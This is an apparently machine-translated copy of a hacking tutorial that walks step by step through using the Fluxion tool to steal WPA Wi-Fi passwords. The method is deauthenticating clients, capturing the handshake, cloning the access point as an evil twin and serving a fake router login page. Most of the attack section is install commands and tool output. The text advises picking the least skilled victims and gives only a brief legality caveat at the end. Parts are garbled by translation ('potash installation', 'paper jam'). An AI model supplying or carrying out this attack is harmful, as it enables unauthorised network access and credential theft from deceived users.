قالب وردپرس درنا توس
Home / Tips and Tricks / Capture WPA Passwords by Targeting a Fluxion Attack «Null Byte :: WonderHowTo

Capture WPA Passwords by Targeting a Fluxion Attack «Null Byte :: WonderHowTo



Because tools like Reaver for pen testers are becoming less viable options as ISPs replace vulnerable routers, there is less and less certainty about which tools are appropriate for a particular target. If you do not have time to crack the WPA password, or if it's unusually strong, it can be difficult to figure out your next move. Fortunately, almost all systems have a common vulnerability that you can count on – users!

Social engineering goes beyond hardware and attacks the most vulnerable part of a system. One tool that makes this easy is Fluxion. Even the most anti-social hacker can hide behind a well-designed login page, and Fluxion automates the process of creating a fake access point to capture WPA passwords.

Selecting the Weakest Links for Attacks

Users are almost always the weakest link in a system, and so attacks against them are often preferred because they are cheap and effective. Hardware concerns can often be ignored if users are not sufficiently familiar with the technology to fall for a social engineering attack. While social engineering attacks can strike flags in more technologically advanced organizations, phishing and spoofing attacks on users are the means of first choice for both nation-states and criminal hackers small and medium-sized businesses that focus on any industry other than technology focus. These companies typically have many vulnerable or unpatched systems with standard credentials that can be easily exploited over their wireless network and that are unlikely to know what an attack looks like.

How Fluxion Works A mix of technical and social automation that entices a user to pass the Wi-Fi password at the touch of a button. In particular, it's a social engineering framework that uses a nasty twin access point (AP), built-in jamming and handshake capture capabilities to ignore hardware and focus on the wetware. Tools such as Wifiphisher perform similar attacks but can not validate the specified WPA passwords.

Image of SADMIN / Null Byte

Fluxion evolved from an advanced social engineering attack called Lindset, in which the first tool was written mainly in Spanish and had several bugs. Fluxion is a rewritten attack to make inexperienced users reveal the password / passphrase of the network.

Fluxion is a unique tool when using a WPA handshake to script not only the behavior of the logon page, but the behavior of the entire page. It blocks the original network and creates a clone with the same name that causes the disconnected user to join. This will display a fake login page stating that the router needs to reboot or load the firmware and requested the network password to continue. It's that simple.

The tool checks the entered password with a detected handshake and blocks the destination AP until the correct password is entered. Fluxion uses Aircrack-ng to live-check the results as they are typed in, and a successful result means the password is ours.

Checking WPA Confirmation of password capture by Aircrack-ng. Image of SADMIN / Null Byte

Tactically, this attack is only as good as the fake login screen. Many have been added to Fluxion since it was created, and it is possible to develop other screens with some research. In general, running this attack with standard login screens immediately draws the attention of a more experienced user or a tech-savvy organization. This attack is most effective when aimed at the one who is the oldest or least skilled in an organization. Sensitive access points with intrusion detection systems may detect this attack and try to block it by blocking your IP address in response to the built-in failure.

System Compatibility and Requirements

Fluxion works under Kali Linux. Just make sure you're fully up to date or running Kali Rolling to make sure the system and dependencies are up-to-date. You can run it on your dedicated potash installation in a virtual machine. If you're looking for a cheap, convenient platform, check out our Kali Linux Raspberry Pi build with the Raspberry Pi for $ 35. This tool does not work with SSH because other windows need to be opened.

For this to work we need a compatible WLAN adapter. Check out our 2019 list of Kali Linux compatible Wi-Fi adapters, or get our most popular adapter for beginners here. Make sure your wireless adapter that supports monitoring mode is plugged in and recognized by Kali and displayed when iwconfig or ifconfig is entered.

Capturing WPA Passwords with Fluxion [19659004] Our goal in this article is to reach an organization through their WPA-encrypted Wi-Fi connection. We will launch an attack against users who are connected to the probe point, capture a handshake, set up a cloned (bad twin) AP, block the target AP, set up a fake login page, and acknowledge the captured password against the handshake ,

Step 1: Install Fluxion

The Fluxion developer recently shut down the product but you can get an older version of it to continue using it. To get the older version of Fluxion running on your Kali Linux system, clone the git repository with:

  ~ # git clone https://github.com/wi-fi-analyzer/fluxion

Cloning in "Fluxion" ...
remote: list objects: 2646, done.
Remote: A total of 2646 (Delta 0), reused 0 (Delta 0), pack-reused 2646
Receive objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB / s, done.
Solving deltas: 100% (1433/1433), done. 

Find missing dependencies by navigating to the folder and listing the content to see what's in it.

  ~ # cd fluxion
~ / fluxion # ls

docs install lib logos siteinstaller.py
Language locale fluxion.sh README.md sites 

Then start it for the first time. You will probably see the following where some dependencies are needed.

  ~ / fluxion # sudo ./fluxion.sh

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  aircrack-ng ..... OK!
aireplay-ng ..... OK!
airmon-ng ....... OK!
airodump-ng ..... OK!
awk ............. OK!
Curl ............ OK!
dhcpd ........... Not installed (isc-dhcp-server)
hostapd ......... OK!
iwconfig ........ OK!
lighttpd ........ Not installed
Macchanger ...... OK!
mdk3 ............ OK!
nmap ............ OK!
php-cgi ......... Not installed
pyrite ........... OK!
Python .......... OK!
unpack ........... OK!
xterm ........... OK!
openssl ......... OK!
rfkill .......... OK!
Strings ......... OK!
Fuser ........... OK! 

To get the needed dependencies and set your board to green, install the missing ones from the list. In my case these are dhcpd, lighttpd and php-cgi.

  ~ / fluxion # apt-get install dhcpd lighttpd php-cgi 

If dhcpd installs udhcpd instead, run the following command to get the correct result.

  ~ / fluxion # apt-get install isc-dhcp-server 

After all dependencies are met, the board is green and you can move to the attack surface. Run the Fluxion command again with sudo ./fluxion.sh to get hacking.

  ~ / fluxion # sudo ./fluxion.sh

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [2] Choose your language

[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[10] French
[11] Slovenian

[deltaxflux@fluxion] - [~] 1 

Step 2: Scan Wi-Fi hotspots

The first option is to select the language. Enter the number next to the desired one and press . Enter to get to the interface selection. Here you can see all connected network interfaces. Dial the number next to the number you want, in my case 1 for wlan2.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  Select an interface
[1] wlan2 Atheros AR9271 ath9k
[2] wlan1 Ralink RT2870 / 3070 rt2800usb
[3] wlan0 Atheros AR9565 ath9k

[deltaxflux@fluxion] - [~] 1 

This will take you to the destination identification. If the channel of the network you want to attack is known, you can enter 2 to restrict the search to the desired channel. Otherwise, select 1 to scan all channels.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [i] Select channel

[1] All channels
[2] Certain channels
[3] Back

[deltaxflux@fluxion] - [~] 1 

During this process, a window WiFi Monitor is opened. Let the scan capture wireless data for at least 30 seconds. The attack must be run for at least 30 seconds to verify that a client is connected to the network. Press ctrl-c or click the window (x) to end the capture process whenever you find the wireless network you want. Then the window is closed and the results are displayed again in the terminal.

Step 3: Select your destination AP.

Select a target with active clients to attack by typing the number next to it. Unless you are waiting for a client to connect (possibly for an extended period of time), this attack will not work on a non-client network. Who would we be fooled if we did not have anyone connected to the network?

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  Wi-LIST

ID MAC CHAN SECU PWR ESSID
[1] BC: F6: 85: 04: A9: 98 9 WPA2 26% ACR North
[2] 14: AB: F0: CC: 6E: 90 4 WPA2 30% cpc-office
[3] B4: 75: 0E: B4: 54: DO 1 WPA2 34% JadeMagnolia
[4] * E8: AD: A6: 55: 31: 9E 11 WPA 34%
[5] E8: ED: 05: 7A: 4D: 70 6 WPA2 36% DG1670A72
[6] A4: 2B: BO: E9: 5B: 6D 1 WPA2 34% MEDICO
[7] 28: 9E: FC: 62: 7A: E6 1 WPA2 37% MySpectrumWiFie0-2G
[8] 84: A0: 6E: C6: 93: CE 1 WPA2 37% MyspectrumWiFic8-2G
[9] 9C: A3: A9: 62: 7C: E4 14 WPA2 36% NVR9ca3a9627ce4
[10] AC: 5D: 10: 4A: 95: 2A 11 WPA2 36% ATT304
[11] 8C: A2: FD: 00: 18: A5 6 WPA2 36% HungryCandy
[12] BO: 98: 2B: 4E: 62: AE 1 WPA2 36% MySpectrumWiFia8-2G
[13] A4: 08: F5: 70: 79: 8A 1 ​​WPA2 36% MySpectrumWiFi84-2G
[14] A0: 39: EE: 7E: 63: DA 1 WPA2 36% MINDEOK-2G
[15] 24: 79: 2A: 93: 50: 38 7 WPA2 34% TWCWiFi Passpoint
[16] 24: 79: 2A: 13: 50: 39 7 WPA2 34% SpectrumWiFi Plus
[17] 8C: A2: FD: 00: 05: 8E 6 WPA2 37% LavishBest
[18] AC: EC: 80: 09: 65: CO 1 WPA 2 37% SHIN
[19] 00: AC: E0: 91: 65: 80 1 WPA2 39% SMQ 2.4
[20] 1A: 91: 82: 8E: DF: FB 4 WPA2 38%
[21] B2: 52: 16: 21: 47: E9 4 WPA2 38% DIRECT-6SMFC-L5700DW_BR47e9
[22] 10: 05: 31: 32: BB: 30 11 WPA2 39% GoGo Foot
[23] EC: 0E: C4: 73: 09: A7 1 WPA2 38% WIFI73C9A4
[24] 20: E5: 2A: 4D: A6: F2 1 WPA2 38% Netgear 100-2G
[25] 98: 6B: 3D: DF: 64: 50 6 WPA2 40% Not defined
[26] 8C: A2: FD: 00: 9C: AD 6 WPA2 39% Wittyslim
[27] F4: 6B: EF: 30: 0F: OE 1 WPA2 40% PT STOP
[28] 38: 3B: C8: 02: 59: 66 4 WPA2 38% ATT386
[29] 8C: A2: FD: 01: 23: 28 6 WPA2 40% Donna 🙂
[30] FE: EC: DA: A4: 06: 40 6 WPA2 40%
[31] 84: A0: 6E: C2: 0A: 2E 1 WPA2 41% MyspectrumWiFi28-2G
[32] 98: 6B: 3D: CA: 45: 70 9 WPA2 42% DG1670A72
[33] 14: 91: 82: 8E: DF: FB 4 WPA2 40% FBISurveillanceTruck
[34] AC: E2: 03: 10: 75: 8A 5 WPA2 42% DIRECT-89-HP Officejet Pro 6970
[35] OU: A2: FD: 01: 2B: 28 6 WPA2 41% Donna 🙂 _Guest
[36] 34: 6B: 46: 40: 5A: 5A 6 WPA2 42% MySpectrumWiFi54-2G
[37] 50: 33: 8B: 68: 2D: 74 1 WPA2 41%
[38] 1C: B9: 04: 6B: 6D: 53 3 WPA2 42% Island 2B6D50
[39] 8C: A2: FD: 00: 63: 41 6 WPA2 43% Stevefi
[40] F4: 6B: EF: 1E: AA: C6 1 WPA2 43% Happy777-2G
[41] 1C: BO: 44: CD: 34: FO 5 WPA2 44% MySpectrumWiFif2-2G
[42] AC: EC: 80: A8: F6: FO 6 WPA2 44% TG1672GF2
[43] * 88: DC: 96: 55: 72: 00 1 WPA2 47% Anchor
[44] BO: 6E: BF: DB: C1: B8 1 WPA2 45% claire
[45] 90: 1A: CA: 6C: 07: 00 1 WPA2 47% piccadilly
[46] * 40: 20: 09: 2A: 64.90 11 WPA2 46% Spot 2.4 GHz
[47] 60: 19: 71: EE: A9: 20 11 WPA2 45% Seoultaxservice
[48] OC: EA: C9: 77: 83: 00 11 WPA 46%
[49] DO: 17: 02: B2: 06: 08 8 WPA2 48% ATI guest
[50] 60: 38: E0: 89: F5: 02 3 WPA2 47% thlee174
[51] 8C: FE: 74: 79: E3: 73 9 WPA2 46% Island 39E370
[52] 40: 70: 09: 74: 48: BO 6 WPA2 47% envy
[53] 28: 9E: FC: 62: 5B: 26 1 WPA2 48% MySpectrumWiFi20-2G
[54] 94: 91: 7F: 25: 41: B1 5 WPA2 58% SSooniestyle
[55] C4: 01: 7C: 13: 10: 09 11 WPA2 60% TWCWiFi Passpoint
[56] CC: 20: 21: 38: 33: 11 10 WPA2 36% DT TUTORING
[57] AC: B3: 13: 07: 42: 70 11 WPA2 28% Vog Hair Salon-1
[58] 28: 9E: FC: 67: 61: 06 11 WPA2 40% MySpectrumWiF100-2G
[59] DC: EF: 09: CD: 30: 37 11 WPA2 36% fobdawg_EXT
[60] AC: B3: 13: 7A: 4A: 90 11 WPA2 38% Gryffindor
[61] C4: 01: 7C: 53: 10: 08 11 WPA2 58% SpectrumWiFi Plus
[62] 8C: A2: FD: 01: 34: 46 6 WPA2 35% Chiefrutabaga
[63] 8C: A2: FD: 00: 41: B3 6 WPA2 35% NNND_NET
[64] CO: C1: CO: B6: F3: 71 6 WPA2 39% SilverHorse
[65] 24: F5: A2: 2D: F8: 09 6 WPA2 36% LALASHOP2.4
[66] 60: 72: 20: 3D: B6: 50 6 WPA2 39% MBC NEW MEDIA SPACE
[67] 08: 02: 8E: BB: 18: 1B -1 WPA2 99%

(*) Active customers

Choose a destination. To rerun, type r
[deltaxflux@fluxion] - [~] 46 

Step 4: Select your attack.

If you entered the number of the destination network, in my case 46 press Enter . to load the network profile into the attack selection. For demonstration purposes I use option 1 to create a "FakeAP" with hostapd. This creates a spoofed hotspot that uses the collected information to clone the destination access point.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  INFO WIFI

SSID = point 2.4 GHz / WPA2
Channel = 11
Speed ​​= 95 Mbps
BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)

[2] Select Attack Option

[1] FakeAP - Hostapd (Recommended)
[2] FakeAP - Airbase-ng (slower connection)
[3] Bruteforce - (handshake is required)
[4] Back

[deltaxflux@fluxion] - [~] 1 

Step 5: Get a handshake.

To verify that the password you have received works, you can compare it to a detected handshake. If you have a handshake, you can enter it in the next screen. If not, we can press the Enter key to force the network to handshake in the next step.

  Location of the handshake (example: /root/fluxion.cap)
Press the ENTER key to skip

Path:

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [2] Handshake check

[1] pyrite
[2] aircrack-ng (Miss chance)
[3] Back

[deltaxflux@fluxion] - [~] 2 

The screen for checking the handshake is displayed as shown above. When using the Aircrack-ng method by selecting option 2 Fluxion sends Deauthentication Packets to the destination AP as a client and listens for the resulting WPA handshake. But first you have to choose who you want to do, which I would recommend option 3 so that you only have the target and not everyone.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [2] * detect handshake *

[1] Deauth all
[2] Disable All [mdk3]
        [3]   Disable Destination
[4] Scan the nets again
[5] Exit

[deltaxflux@fluxion] - [~] 3 

Two windows are displayed, one for capturing data on the channel and one for de-authenticating the client . At the top of the first screen, make sure that the "WPA handshake" is displayed. If you see it, as shown at the top right of the screenshot below, you have captured the handshake.

Close both windows. Back in Terminal Type 1 for "Check handshake" and press Enter to load the handshake into your attack configuration.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [2] * detect handshake *

Status handshake:

[1] Check handshake
[2] Back
[3] Choose a different network
[4] Exit
#> 1 

Now create an SSL certificate, option 1 so you can pop up without raising an alarm and preventing the browser from navigating to it.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  Certification invalid or missing, please select

[1] Create an SSL certificate
[2] Search for SSl certificate
[3] Exit

#> 1 

Step 6: Create the Fake Login Page

Now it's time to create the fake login page. Select 1 for "Web Interface" to use the social engineering tool.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  INFO WIFI

SSID = point 2.4 GHz / WPA2
Channel = 11
Speed ​​= 95 Mbps
BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)

[2] Choose your option

[1] Web interface
[2] Bruteforce
[3] Exit

#? 1 

You will receive a menu with various fake login pages that you can offer to the user. These are customizable with some work, but should match the device and language. The default settings should be tested before use, as some are not very convincing. I have chosen an English Netgear attack option 27 .

This is the last step to arm the attack. Now you can start. Press Enter after selecting your language option to start the attack.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  INFO WIFI

SSID = point 2.4 GHz / WPA2
Channel = 11
Speed ​​= 95 Mbps
BSSID = 40: 70: 09: 7A: 64: 90 (ARRIS Group, Inc.)

[2] Select login page

[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbian [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesian [ID] (NEUTRA)
[20] Dutch [NL]
        [21]   Danish [DAN]
        [22]   Hebrew [HE]
        [23]   Thai [TH]
        [24]   Portuguese [BR]
        [25]   Slovenian [SVN]
        [26]   Belkin [ENG]
        [27]   Netgear [ENG]
        [28]   Huawei [ENG]
        [29]   Verizon [ENG]
        [30]   Netgear [ESP]
        [31]   Arris] Vodafone [ESP]
        [33]   TP-Link [ENG]
        [34]   Ziggo [NL]
        [35]   KPN [NL]
        [36]   Zigoo2016 [NL]
        [37]   FRITZBOX_EN [DE]
        [38]   FRITZBOX_ENG [ENG]
        [39]   GENEXIS_DE [DE]
        [40]   Login Netgear [19659099
[43] Google
[44] MOVISTAR [ESP]
        [45]   Back

#? 27

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [i] Attack is underway.
[1] Choose another network
[2] Exit

#> 

The attack opens multiple windows to create a cloned version of their wireless network while blocking the common access point. The user is tempted to join the network with the same name but without encryption.

Step 7: Capture the password [19659004] The user is notified of a fake logon page that either convinced or not, depending on which you have chosen.

Perhaps not the most elegant delusion, but these files make it configurable.

If you enter an incorrect password, the handshake check fails and the user is prompted to try again. After entering the correct password, Aircrack-ng will check the password and save it in a text file as it is displayed on the screen. The user is directed to a "thank you" screen when the paper jam stops and the wrong access point is closed.

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
  [FLUXION2< Fluxion Is The Future >
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  [-] Cleaning and closing
[-] Disable monitoring interface mon0
[-] Disable interface wlan1
[-] Disable forwarding of packets
[-] Cleaning of iptables
[-] Restore Tput
[-] Delete files
[-] Restarting Network Manager
[-] Clean up done successfully!
[+] Thank you for using Fluxion. 

You can verify your success by checking the screen of the Aircrack-ng WiFi Information screen.

Congratulations, you've been able to get and verify a password by targeting the " Wetware "was provided. You've tricked a user into entering the password instead of relying on an existing security flaw.

Warning: This technique may be illegal without permission.

Fluxion legally combines scanning, cloning, creating a fake access point and creating a phishing logon screen and using the Aircrack-ng script to retrieve and crack WPA handshakes. As such, it leaves behind signatures in router protocols that are consistent with these techniques. Most of these practices are illegal and undesirable on any system you do not have permission to test.

Cover Picture and Screenshots of SADMIN / Null Byte

Source link